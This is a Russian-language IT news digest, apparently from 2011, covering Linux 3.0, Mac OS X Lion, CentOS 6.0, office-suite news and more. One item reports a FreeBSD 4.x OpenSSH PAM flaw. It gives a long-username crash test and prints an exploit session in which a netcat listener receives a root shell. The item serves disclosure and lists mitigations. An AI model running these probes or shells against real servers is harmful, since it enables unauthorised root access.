Линус Торвальдс анонсировал релиз Linux-ядра 3.0, в котором завершена интеграция поддержки XEN dom0, в netfilter интегрирован JIT-компилятор BPF-правил, добавлена реализация кэша Cleancache, обеспечена поддержка "Wake on WLAN", реализована автоматическая дефрагментация в Btrfs. Выпуск 3.0 ознаменовал завершение развития ветки 2.6.x, которая развивается уже около 10 лет и переход к новой схеме нумерации. Следующим после 3.0 выпуском станет версия 3.1, затем 3.2 и так далее, пока не пройдут очередные 10 лет или не возникнет потребность коренных изменений, связанных с глобальной переработкой ключевых подсистем или нарушением совместимости. В процессе накопления патчей корректирующие обновления будут представлены как 3.0.1, 3.0.2, 3.0.3 и т.п.

Отдельно подчеркивается, что версию 3.0 не стоит считать каким-то кардинальным шагом, какой можно было наблюдать при появлении GNOME 3.0 или KDE 4.0. Linux-ядро 3.0 - не более чем формальная смена нумерации, приуроченная к двадцатилетию проекта и десятилетию существования ветки 2.6.x. В новой версии нет каких-либо серьезных нарушений совместимости или специальных новшеств. Новое ядро плавно продолжает развитие текущей кодовой базы и по уровню нововведений сравнимо с выпуском версии 2.6.40. Более того, число изменений по сравнению с прошлыми выпусками выглядит достаточно скромно. Процесс разработки также остаётся прежним.

В новую версию принято 9862 исправлений от 1276 разработчиков, размер патча - 44 Мб (добавлено 8002 тыс. строк кода, удалено - 7946 тыс. строк). Около 41% всех представленных в 3.0 изменений связаны с драйверами устройств, примерно 25% изменений имеют отношение к обновлению кода специфичного для аппаратных архитектур, 15% связано с сетевым стеком, 5% - файловыми системами и 5% c внутренними подсистемами ядра.

Наиболее интересные новшества ядра 3.0:

\cut{Читать далее}

Виртуализация и безопасность

•   Окончание интеграции полной поддержки Dom0 и DomU в Linux-ядро. В состав ядра 3.0 принят бэкенд xen-blkback, необходимый для обеспечения работы виртуальных блочных устройств. Таким образом в стандартном ядре теперь содержится полный набор средств, необходимых для работы Xen в качестве управляющего хоста и гостевой системы. Отныне поддержка Xen будет неотделима от ядра Linux и будет развиваться вместе с ним, без ведения отдельных веток и поддержания дополнительных патчей;
•   Поддержка раздельных номеров файловых дескрипторов внутри изолированных пространств Namespace. Namespace является своеобразной легковесной техникой виртуализации, при которой некоторые процессы могут быть отрезаны от остальной системы, работая в отдельном пространстве имен и не влияя на другие части системы;

  Дисковая подсистема, ввод/вывод и файловые системы

•   Улучшение файловой системы Btrfs:

  Поддержка автоматической дефрагментации. Btrfs больше подвержена фрагментации, так как использует при записи данных подход COW (copy-on-write), при котором при изменении содержимого файла данные не переписываются в уже распределенных блоках, а копируются и сохраняются в новом свободном блоке, что позволяет организовать работу снапшотов. Кроме ранее доступной команды "btrfs filesystem defragment" и отключающей COW опции монтирования "-o nodatacow", в новой версии ядра представлена поддержка автоматической дефрагментации, включаемая через опцию монтирования "-o autodefrag". Суть механизма автоматической дефрагментации сводится к обнаружению небольших случайных операций записи в файлы и построению специальной очереди, которую разбирает специальный внутренний дефрагментатор. Данный метод еще плохо адаптирован для работы с большими БД или виртуализацией, но уже хорошо работает при изменении небольших файлов, в процессе использования таких систем, как rpm, sqlite и bdb;

  Реализация процесса проверки целостности данных ("Scrubbing") в файловой системе путем сверки указанных в экстентах контрольных сумм с контрольными суммами, вычисленными на основе фактических данных. В случае выявления расхождений предпринимается попытка поиска неповрежденной копии данных;

  Увеличение скорости создания и удаления файлов. Основные проблемы с производительностью при создании и удалении файлов связаны с необходимостью выполнения большого числа сопутствующих действий с b+ деревьями. Для ускорения подобных операций реализован метод отложенного изменения b+ деревьев. В итоге производительность создания файлов возросла на 15%, а удаления на 20%;

  Ускорение выполнения операций по сбросу буферов на диск (при выполнении fsync на диск теперь сбрасываются только изменившиеся с момента последней синхронизации данные). Скорость выполнения теста sysbench при сочетании случайно записи с вызовом fsync возросла с 112.75 запросов в сек. до 1216 запросов в сек.

  Поддержка метода "Quasi-round-robin" при распределении блоков в конфигурациях с несколькими дисками. Новый метод позволяет полностью использовать при разнесении данных (stripe) все доступное дисковое пространство, используя для хранения в первую очередь диски, на которых больше доступного места;

•   Проведение оптимизации и чистки кода в подсистеме VFS;

  Сетевая подсистема

•   В код netfilter интегрирован JIT-компилятор для правил BPF (Berkeley Packet Filter), поддерживающий работу на системах x86-64, что позволит значительно увеличить производительность обработки пакетов пакетным фильтром при использовании инструментов, подобных libpcap/tcpdump;

•   Поддержка отправки ICMP_ECHO ICMP-пакетов и приема ICMP_ECHOREPLY ответов в непривилегированном режиме, что позволяет организовать работу ping и других отладочных утилит без предоставления дополнительных привилегий через suid-бит или capabilities;

•   В беспроводной стек добавлена поддержка функции "Wake on WLAN", позволяющей перевести систему в режим низкого потребления энергии (ACPI S3 suspend) с сохранением активности беспроводного сетевого интерфейса, т.е. в момент сна может быть сохранено соединение с точкой доступа и обеспечено просыпание при появлении адресованного текущему хосту трафика;

  Память и системные сервисы

•   Реализация нового типа кэша Cleancache, который может использоваться ядром для хранения восстановимых из других источников данных, которые не страшно потерять, но при наличии ресурсов неплохо держать в памяти. Например, в Cleancache могут храниться ассоциированные с файлами на диске страницы памяти, которые в случае очистки кэша впоследствии могут быть перечитаны с диска. Поддержка CleanCache уже добавлена в Ext3, Ext4, Btrfs, OCFS2 и Xen. Cleancache является первой практической реализацией появившейся в ядре 2.6.39 техники трансцендентного управления памятью ("Transcendent memory"), позволяющей улучшить поведение системы при работе с не представляющими важность данными (например кэш) в условиях дефицита оперативной памяти. По сути Transcendent memory напоминает RAM-диск, имеющий ряд особенностей: размер RAM-диска не известен, запись данных не всегда может быть гарантирована и уже записанные данные могут быть очищены (удалены);

•   Поддержка системного вызова sendmmsg(), который позволяет организовать передачу в рамках одного системного вызова сразу нескольких сообщений, которые ранее потребовали бы отдельных вызовов sendmsg(). Технология значительно повышает эффективность работы приложений передающих большие объемы данных или оперирующих пакетами небольшого размера. Тестирование показало, что использование sendmmsg() позволяет повысить скорость отправки данных через UDP-сокет на 20%, а через RAW-сокет на 30%. Напомним, что поддержка парного вызова recvmmsg() была добавлена в ядре 2.6.33;

•   Поддержка системного вызова setns(), который позволяет использовать для файлового дескриптора определенное изолированное пространство имен (namespace);

  Оборудование и аппаратные архитектуры

•   Продолжение реорганизации кода, связанного с платформой ARM;

•   Добавление разработанного в рамках проекта OpenKinect драйвера для устройств Microsoft Kinect. В настоящее время драйвер способен принимать с устройства видеопоток, взаимодействуя с RGB-сенсором или монохромным сенсором, т.е. позволяет использовать Microsoft Kinect в роли web-камеры или инфракрасной камеры. Датчики глубины пока не поддерживаются;
•   Обновление кода DRM-модулей Intel, Radeon и Nouveau. Проведена оптимизация производительности для гибридных процессоров Intel Sandy Bridge, обеспечена начальная поддержка Intel Ivy Bridge и AMD Fusion Llano APU;
•   Для беспроводных карт Realtek представлен новый драйвер rtl8192se;

Сегодня Apple выпустила в свет новую версию своей операционной системы Mac OS X — 10.7 под кодовым именем Lion, разработка которой заняла почти два года.

Обновление доступно для всех пользователей Mac OS X Snow Leopard через Mac App Store и стоит всего $29,99!

Всего более 250 нововведений, главные из которых:

Мультитач жесты — прокрутка, масштабирование, переключение между программами посредством тачпада, трэкпада или эппловской мыши. Полноэкранные приложения получили «родную» поддержку, доступна навигация между ними и обычными приложениями с помощью жестов. Launchpad — приложение для запуска программ; отображает установленные приложения в гриде, позволяет группировать их по страницам и папкам, как на iOS. Mission Control объединяет некоторые функции Dashboard, Exposé и Spaces; в частности, даёт возможность просматривать все окна запущенных приложений с умной группировкой. FileVault теперь предоставляет шифрование всего диска, а также внешних носителей; используется XTS-AES-128. Улучшена поддержка ASLR. «Возобновление» сохраняет состояние приложений при закрытии, восстанавливая его при следующем запуске. «Автосохранение» и «Версии» — файлы программ с поддержкой этих функций будут сохраняться автоматически с возможностью просматривать все версии документов, как в Time Machine. Многие стандартные приложения теперь имеют интерфейс, подобный своим iPad-версиям (в том числе полноэкранный режим); много улучшений в Finder, Mail, Terminal, QuickTime; FaceTime теперь поставляется с системой. Локализация — добавлены новые языки, более 40 голосов VoiceOver, поддержка вертикального текста для восточноазиатских языков, эмодзи.

Список новых функций:  http://www.apple.com/macosx/whats-new/features.html

Вместе с тем, пропали Front Row, Rosetta и Samba. JRE и Flash Player больше не поставляются с системой, но могут быть поставлены пользователем самостоятельно.

Ситуация со свободными офисными пакетами становится всё более интересной. Корпорация IBM, развивающая Lotus Symphony на базе OpenOffice.org, решила передать код этого проекта некоммерческой организации Apache Software Foundation (ASF).

Lotus Symphony — коммерческое офисное решение от IBM, основанное на разработках OpenOffice.org и распространяемое бесплатно (но без исходного кода, т.е. как freeware). При этом в IBM признаются, что никогда не были по-настоящему активными участниками Open Source-проекта OpenOffice.org, хотя и «присутствовали на различных собраниях, спонсировали конференции и работали совместно над стандартами». Код Lotus Symphony поддерживался своими силами и развивался как самостоятельный форк, который редко возвращал что-либо основному проекту.

Теперь ситуация изменится. Исходный код IBM Lotus Symphony будет передан на условиях лицензии Apache License 2.0 проекту OpenOffice.org, ныне управляемому организацией ASF. Кроме того, IBM обещает работать с участниками проекта над интеграцией некоторых созданных в корпорации наработок из Lotus Symphony в OpenOffice.org. В частности, у IBM есть опыт по замене лицензированных под GPL/LGPL зависимостей, что потребуется ASF для перевода всего проекта на Apache License. Речь идет и о функциональных вещах: IAccessible2, поддержка макросов VBA, улучшения в пользовательском интерфейсе.

Вместе с тем, IBM предложит ASF новый проект для «инкубации» — ODF Toolkit. Это набор Java-библиотек для приложений, работающих с офисными документами в формате OpenDocument.

Официальный анонс всех этих инициатив IBM состоится сегодня на мероприятии ODF Plugfest в Берлине (Германия). В жизнь они будут воплощаться в течение «пары следующих месяцев».

Тихо и незаметно вышел долгожданный CentOS 6.0

Как пишут сами разработчики

•   CentOS 6.0 represents many changes from previous releases.
•   CentOS 6.0 has been completely rebuilt using a newer build system and library checks to confirm upstream binary compatibility.
•   CentOS 6.0 при исталяции позволяет использовать все разделы(каналы) с пакетами, в том числе Optional

Баги и фичи:

Для установки системы минимально необходимо 392 Мб памяти, если в системе памяти меньше 652Мб, то автоматом используется текстовый режим установки. При этом установка в текстовом режиме имеет ограниченные возможности по настройке дисков и устанавливаемых пакетов.

1. Сообщение "Insufficient memory to configure kdump!" появляющееся во время установки. Извесный баг возникающий на системе имеющей менше 4 Гб оперативной памяти и решается обновлением kexec-tools-2_0_0-153_el6 или новее.
2. Версия дистрибутива для x86_64 разделена на 2 DVD, второй диск содержит пакеты из "Optional" раздела, который как правило ненужен при установке дистрибутива.
3. ISO образ дистрибутива для i386, слишком большой для записи на односторонний DVD+R и может быть записан на DVD-R.

На прошлой неделе в Бразилии прошел 12-й Международный форум по свободному программному обеспечению (Fórum Internacional do Software Livre, FISL). На нем было объявлено о том, что правительство Бразилии подписало «соглашение о намерениях», в рамках которого планируется его непосредственное участие в проектах свободных офисных пакетов.

Редакции nixp.ru стало известно об этом от Саймона Фиппса (Simon Phipps), экс-главы Sun Microsystems по Open Source. Сам он весьма воодушевлен этим событием, подчеркивая, что теперь «Бразилия начнет не только использовать офисные приложения, от которых она зависит, но и напрямую взаимодействовать с ними», а «рост базы разработчиков — это новости, которые нам всем так нужны».

Соглашение было подписано исполнительным комитетом по свободному программному обеспечению от имени правительства Бразилии с одной стороны, представителями организаций The Document Foundation (TDF) и Apache Software Foundation (ASF) — с другой.

Прямой интерес бразильских чиновников в развитии свободных офисных пакетов связан с их широким распространением в государственных структурах и подведомственных организациях. Заявляется, что эти пакеты используются на «более 1 миллиона общественных компьютеров, что представляет существенную экономию на лицензионных отчислениях за ПО и национальные инвестиции в технологии».

Вышел одиннадцатый номер журнала UserAndLINUX. Тема номера – Обмен мгновенными сообщениями: есть ли достойные приложения под Линукс?

В номере: • Обзоры IM-клиентов, приложений для общения по VoIP, VVoIP, FoIP, sip-, XMPP/Jabber-, ICQ- и twitter-клиентов; • Google платит русскому студенту за ошибки в Chrome; • Русский хакер вскрыл секретный протокол Skype; • ICQ отправилась покорять Linux; • Обзоры рынка мобильных устройств; • 10 интернет-рекордов; • Зеленые Андроиды наводнили метро!; • 10 наиболее распространенных паролей iPhone; • Рейтинг самых опасных ошибок при создании программ; • ООН против лишения права на Интернет; • 15-летний выходец из Украины продал программу крупной IT-компании; • Исследование показало, что в составе GNU/Linux всего 8 процентов GNU; • Первые хромбуки: кто уже выпускает?; • LexisNexis: наше решение с открытым кодом в 4 раза быстрее, чем Hadoop.

PDF - 56 страниц, 4.9Мб Печатный - 100 стр.

В используемом в Ubuntu 11.04 и Fedora 15 Linux-ядре 2.6.38, а также в 2.6.39 и тестовых версиях 3.0-rc наблюдается возрастание энергопотребления на 10-30%. Кроме Phoronix подобная тенденция наблюдалась в тестах издания Tom's Hardware.

По предварительным данным, одна из приводивших к повышению энергопотребления проблем связана с изменением в коде поддержки ASPM (Active-State Power Management) для плат PCI Express, который стал активироваться только при сигнализации о поддержке ASPM со стороны BIOS (определенные реализации BIOS указывают, что ASPM не поддерживается, но все равно инициализирует данную поддержку для некоторых устройств).

Экспериментальным путем был выявлен обходной путь решения проблемы, который позволяет уменьшить энергопотребление в среднем на 15%. Для решения проблемы систему следует загрузить передав ядру в интерфейсе загрузчика GRUB параметр "pcie_aspm=force".

В Debian для grub2 нужно следующее:

1. Исправить в файле /etc/default/grub строку

GRUB_CMDLINE_LINUX="pcie_aspm=force"

2. Запустить update-grub

Все операции естественно от рута

Тихо и незаметно в списке рассылки full-disclosure представлена критическая уязвимость в используемой во FreeBSD 4.x версии OpenSSH, позволяющая удаленному злоумышленнику без аутентификации получить root-доступ к системе. Уже создан и публично опубликован эксплоит, позволяющий получить привилегированный shell на подверженных уязвимости серверах.

Уязвимость проявляется для протоколов SSH1 и SSH2. Проблема вызвана ошибкой в реализации аутентификации с использованием PAM на платформе FreeBSD. Проблема присутствует в функции "pam_thread()" из файла auth2-pam-freebsd.c.  http://www.freebsd.org/cgi/cvsweb.cgi/src/crypto/openssh/Attic/auth2-pam-freebsd.c Начиная с версии FreeBSD 5.2 содержащий уязвимость файл auth2-pam-freebsd.c был заменен новой реализацией, т.е. с большой долей вероятности можно утверждать, что новые версии FreeBSD проблеме не подвержены. 100% уверенности пока нет, так как точно не ясно, не перекочевал ли проблемный код в какие-либо библиотеки PAM или сторонние реализации OpenSSH, используемые и поныне. Детальный аудит ещё предстоит провести.

Ошибка проявляется при передаче слишком длинного имени пользователя. Простой способ проверить наличие уязвимости - попытаться обратиться к своему серверу, указав логин порядка 100 символов. Например: "ssh -l`perl -e 'print "A" x 100'` хост", в случае проблемы, можно наблюдать крах рабочего процесса sshd и вывод в лог /var/log/messages сообщения "/kernel: pid N (sshd), uid 0: exited on signal 11 (core dumped)". Изучение core-дампа показало, что проблема подвержена эксплуатации, так как атакующий может контролировать указатель перехода и позиционировать его на shellcode. Прототип рабочего эксплоита был успешно создан путем небольшой модификации кода ssh-клиента из пакета OpenSSH 5.8p2.

$ ./ssh -1 192.168.1.1 $ nc -v -l -p 10000 listening on [any] 10000 ... 192.168.1.1: inverse host lookup failed: Unknown host connect to [192.168.1.2] from (UNKNOWN) [192.168.1.1] 1038 uname -a FreeBSD h4x.localdomain 4.11-RELEASE FreeBSD 4.11-RELEASE #0: Fri Jan 21 17:21:22 GMT 2005 /GENERIC i386

id

uid=0(root) gid=0(wheel) groups=0(wheel)

Поддержка ветки FreeBSD 4.x прекращена ещё в 2007 году, но данная версия все еще используется на некоторых серверах в сети. Пользователям версии FreeBSD 4.x рекомендуется срочно обновить OpenSSH до более новой версии. В качестве обходного пути решения проблемы следует разрешить через пакетный фильтр доступ по SSH только для доверительных хостов и отключить поддержку PAM, указав в настройках "ChallengeResponseAuthentication no". Информации о возможности поражения других операционных систем, использующих устаревшие версии OpenSSH с реализацией поддержки PAM от проекта FreeBSD, пока нет.

Тянуто c Opennet.ru

Семь сайтов были заблокированы сроком на месяц (с начала мая до начала июня) по заявлению «Централ партнершип» (ЦПШ), рассказала «Ведомостям» пресс-секретарь управления «К» (БСТМ МВД России) Лариса Жукова.

...

Подчиняться полицейским готовы не все. Блокировали доступ к пиратским сайтам только ООО «Ай-пи-ти-пи» (IPTP Networks), ЗАО «РетнНет» (RETN), ООО «Рускомнет», хотя предписание было направлено и другим магистральным провайдерам — ОАО «Комкор», ЗАО «Компания «Транстелеком» (ТТК), ОАО «Вымпелком», ОАО «МТС», ОАО «Ростелеком» и ЗАО «Раском», рассказала Жукова. По ее словам, управление «К» собирается жаловаться в Роскомнадзор на отказавшихся сотрудничать провайдеров МТС, «Раском», «Комкор» и ТТК, а также на «Вымпелком» и «Ростелеком», не ответивших полиции.

...

Учебник «Learning Go» подойдет для тех, кому мало официального Go Tutorial, но при этом лень читать спецификацию языка.

Книга свёрстана на LaTeX и распространяется под CC BY-NC-SA 3.0. Автор (Miek Gieben) периодически дополняет и редактирует книгу.

Отсюда можно выкачать последние редакции указанного учебника в PDF:

 http://www.miek.nl/files/go/